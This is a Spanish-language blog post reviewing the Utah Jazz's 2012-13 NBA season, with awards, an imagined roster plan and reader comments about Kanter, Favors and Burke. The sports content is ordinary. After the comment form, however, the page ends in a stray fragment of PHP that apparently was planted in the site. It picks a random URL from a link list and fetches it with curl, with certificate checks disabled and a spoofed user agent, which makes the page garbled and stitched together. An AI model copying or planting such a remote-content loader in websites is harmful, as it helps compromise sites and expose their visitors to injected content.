Utah Jazz: Aprobado

10 de July de 2013 por Simon

Utah Jazz se presentaba este año con la aspiración de meterse nuevamente en Play Off pero a pesar de conseguir un porcentaje de victorias prácticamente idéntico, este año no les ha llegado ante la sustancial mejora de equipos como Houston o Golden State. No obstante el equipo dio justamente lo que se esperaba de él. El único problema fue que hubo mejores equipos que ellos, por lo tanto nada que reprochar.

Hablar de Utah es hablar de un equipo tradicionalmente duro de roer en casa pero lejos del Energy Solutions Arena suele sufrir bastante. Esta temporada se han ceñido de nuevo al plan, tan sólo 7 equipos en toda la liga han cosechado más victorias en casa que Utah Jazz. En realidad hay poco que contar de Utah. Como hemos dicho el guión preestablecido antes de la temporada se cumplió paso por paso. Al Jefferson un año más ha sido el máximo anotador y reboteador del equipo, aunque su rendimiento ha bajado un pelín respecto a temporadas anteriores. Su compañero en la pintura, Paul Millsap, ha firmado otra sólida campaña pero al igual que Jefferson  su rendimiento nos ha dejado más frío que en temporadas anteriores. Hablamos de sensaciones. Si miran los números verán que son casi idénticos a temporadas pasadas. La pareja, a pesar de mantener sus número,s no ha parecido tan dominante como años anteriores y podríamos decir que aunque han sido los mejores estadísticamente del equipo, el liderato del mismo no lo han llevado ellos sinó Gordon Hayward. Sus números no han crecido en exceso pero sí que parece que esta temporada se ha hecho con el papel de líder ante la falta de uno en Utah. En cuanto a los jóvenes internos Enes Kanter y Derrick Favors, que se supone serán el futuro de la franquicia, apenas han dispuesto de oportunidades verídicas para mostrar lo que valen. A pesar de tener un buen rendimiento no terminan de apostar por ellos y ninguno ha podido mostrar una mejora ostensible en su juego por la falta real de oportunidades. 

Como ya hemos dicho, a comienzos de temporada muy poca gente apostaba por verlos en Play Off  aunque todos sabíamos que iban a estar en la lucha. Estuvieron en puestos de Play Off prácticamente desde el primer momento y prácticamente hasta el final. A pesar de que sus primeros dos meses fueron muy mejorables, un gran mes de Enero los afianzó en los últimos puestos que daban acceso a la lucha por el título. En Marzo, cuando equipos como Lakers, Rockets o Dallas comenzaron a pisar el acelerador a tope y subieron su porcentaje de victorias de forma considerable, ellos no fueron capaces de hacerlo. Incluso la presión parecía poderles y en algunos partidos los vimos derrotados, como si hubieran tirado la toalla, pero una serie de partidos seguidos en casa los metió de nuevo en la pomada. Finalmente los Lakers fueron mejores que ellos y les robaron la cartera tras estar casi toda la temporada en puestos de honor. Una pena sin duda para un proyecto que parece haber llegado a su final con el término de los contratos de Jefferson y Millsap.

PREMIOS

MVP: Difícil elección. Nos vamos a quedar con Gordon Hayward. Mirando los números de toda la temporada objetivamente nos habríamos quedado con Al Jefferson pero el joven alero formado en Butler fue de menos a más en su temporada cogiendo las riendas del equipo en los momentos complicados y haciendo un poco chico para todo. Hayward no tiene talento ni físico para ser un líder, ni siquiera una estrella, pero sin duda es una pieza importante en el futuro de Utah.

Sorpresa: Visto el rendimiento de todos los jugadores prácticamente nadie ha tenido un rendimiento que nos haya causado una sorpresa positiva. Si acaso la mayor sorpresa es que finalmente no haya salido ninguno interno traspasado durante la temporada, algo que casi todo el mundo daba por seguro.

Decepción: Los dos Williams nos valdrían. Quizás es que algunos esperábamos demasiado de él, pero a mi Mo Williams me ha defraudado. Parecía estar en el equipo perfecto, sin competencia, con galones y con dos interiores que podían dejarle hueco fuera para explotar su buena mano pero a la hora de la verdad su rendimiento no ha mejorado y ha sido bastante gris. El caso de Marvin es peor que el de MO. En un equipo peor que Atlanta Hawks ha anotado menos, ha lanzado peor y ha reboteado menos. También ha jugado menos pero más debido a su pobre rendimiento que a otros factores.

Esfuerzo en vano: Mención para los últimos partidos de Al Jefferson para tratar de meterse en Play Off que finalmente resultaron en vano ante el empuje de Lakers y Rockets.

JUGANDO A GM

Mil y un movimientos habíamos “maquinado” y en el fondo ha sido prácticamente lo mismo que han terminado por hacer los Jazz. Apostar por los jóvenes. En principio añadíamos algunos jóvenes más que sacábamos por Jefferson pero ahora esa posibilidad se ha escapado así que viendo el poco espacio y ambición que va a mostrar Utah para el año que viene apenas vamos a completar la plantilla para pasar la temporada lo mejor posible. Tenemos comprometidos 47M para la presente temporada. A pesar de que nuestra intención inicial no está la de competir este año, hay que ir pensando en el futuro de la plantilla.

  • Lo ideal sería que ni Biedrins ni Jefferson conocieran a ningún jugador de la plantilla para que no los puedan malear pero el valor de ambos durante la temporada puede verse aumentado conforme se acerque el cierre de mercado. Tranquilos, en ningún momento estoy pensando en una resurrección deportiva. Estoy pensando en el valor de sus expiring que nos servirían para adquirir contratos de jugadores que nos interesen o incluso traspasarlos por rondas a equipos que quieran entrar fuerte en la próxima agencia libre.
  • Me gustaría renovar a Mo Williams pero ya ha dicho que no piensa ser suplente, y Burke es el futuro de esta franquicia por lo que eso descarta su continuidad.
  • Tinsley puede renovar por el mínimo y ayudar a Burke.
  • Corey Brewer es un jugador que aporta en muchas facetas del juego y que podría ser importante para el futuro de la franquicia. Entre 20 y 24 x 4 temporadas estaría dispuesto a dar por él.
  • Tyler Hansbrough es un interno joven que puede complementarse bien con nuestras dos torres. Si no sale excesivamente caro podríamos tratar de firmarlo con un contrato corto para “probarlo” y mantener la flexibilidad salarial.
  • Marvin Williams podría tener un buen atractivo dado que es un jugador de nivel medio y expiring. Algún equipo de Play Off con una ronda alta seguro que está dispuesto a dárnosla a cambio del alero.
  • Si hemos hecho todo lo anterior ya no nos queda espacio para mucho más por lo que los fichajes para completar el backcourt son todavía de perfil más bajo a los anteriores. Bases como Udrih o Gibson o escoltas como  Ellington, Morrow o Wes Johnson vendrían con un contrato bajo y de un año intentando reivindicarse o encontrar su sitio en la liga.

Nos quedaría algo parecido a esto:

Bases: Burke/Udrih/Tinsley
Escoltas/Aleros: Burcs/Morrow/Hayward/Brewer/Jefferson
Internos: Favors/Kanter/Mullens/Hansbrough/Evans/Biedrins/Gobert

El equipo que nos queda no es gran cosa pero al menos nos dará para luchar por hacer un buen papel dentro de lo que cabe y nos colocará en un buen lugar para mantener el verano que viene a Favors y Hayward. Parece que hay mucho interno pero en realidad Gobert pasará casi toda la temporada en la liga de desarrollo y Evans al fin y al cabo sólo está para los minutos de la basura. Biedrins y Jefferson tienen contrato pero ni vamos a contar con ellos para la plantilla. Un veterano curtido en mil batallas vendría de lujo a este equipo pero  siendo realistas, no sé qué atractivo pueda tener una franquicia en construcción en Utah para un veterano en el final de su carrera.

Comenta

8 comentarios a esta entrada

  1. Heineken dice:
    #1

    Tankeo claro, sin más. Aun así creo que quedaran por encima de Phoenix por ejemplo.

    Y para mi la temporada de Mo Williams estaba siendo bastante buena hasta su lesión, momento donde las opciones de playoffs bajaron mucho.

      Citar

  2. lost dice:
    #2

    Este equipo es para mí uno de los que van a dominar la NBA dentro de 3-4 años si sus jugadores se desarrollan al nivel esperado y mantienen el bloque. Burke, Hayward, Kanter,… Futuro. No creo que puedan tankear porque hay 10 equipos en la liga que se están dando hostias por Wiggins y no les va a llevar a nada. Teniendo peor plantilla que el año pasado van a dar la misma guerra.

      Citar

  3. Denise dice:
    #3

    lost: No creo que puedan tankear porque hay 10 equipos en la liga que se están dando hostias por Wiggins y no les va a llevar a nada. Teniendo peor plantilla que el año pasado van a dar la misma guerra.

    Solo el hecho de comerse a Biedrins y a Jefferson ya es tankear, y van a perder partidos de forma grotesca. Junto a los 76ers y los Suns el peor equipo de largo de la competición. No veo ni de lejos a 10 equipos peores que ellos.

    PD: Trey Burke, rookie del año.

      Citar

  4. Simon dice:
    #4

    Hombre yo creo que van a acabar co un mal balance pero fruto de la inesperiencia y juventud del plantel pero estoy seguro dw que van a competir y a luchar hasta donde puedan a diferencia de equipos como Sixers, Celtics, Suns. Pero si, no creo que haya mas de 3 o 4 equipos que vayan a quedar por debajo de ellos. En el Oeste porque salvo Suns van a.competir todos y en el Este porque hay muchos partidos entre equipos malos lo q les sube siempre laa victorias a los del Este.
    Ojito porque Kanter y Favors son desde ya candidatos al MIP.

      Citar

  5. txusma dice:
    #5

    Entre Kanter y Favors me da que va a ser Kanter el que la va a romper. Favors mejorará y lo veo en 14-10 pero Kanter en ataque es muy bueno y a lo mejor el 18-9 lo consigue.

      Citar

  6. Simon dice:
    #6

    si. para mi Kanter es el bueno de la pareja. yo es que estoy espectante de ver lo que puede llegar a dar…

      Citar

  7. txusma dice:
    #7

    Simon:
    si. para mi Kanter es el bueno de la pareja. yo es que estoy espectante de ver lo que puede llegar a dar…

    Tb hay que decir q los veo muy complementarios. Derrick Favors es muy carpanta y parece buen defensor. En ataque el protagonismo será para Kanter y Favors aprovechará los rebotes en ataque y los pick-and-roll. A ver que ofrecen.

      Citar

  8. simon dice:
    #8

    Si, son super complementarios e intercambiables entre ambos pudiendo cambiarse de marca y marcar al 4 o al 5 segun las necesidades. Es lo que tu dices, Favors tiene pinta de poder dominar la liga desde la defensa y Kanter desde el ataque… preciosa la pinta que tiene la pintura de Utah

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>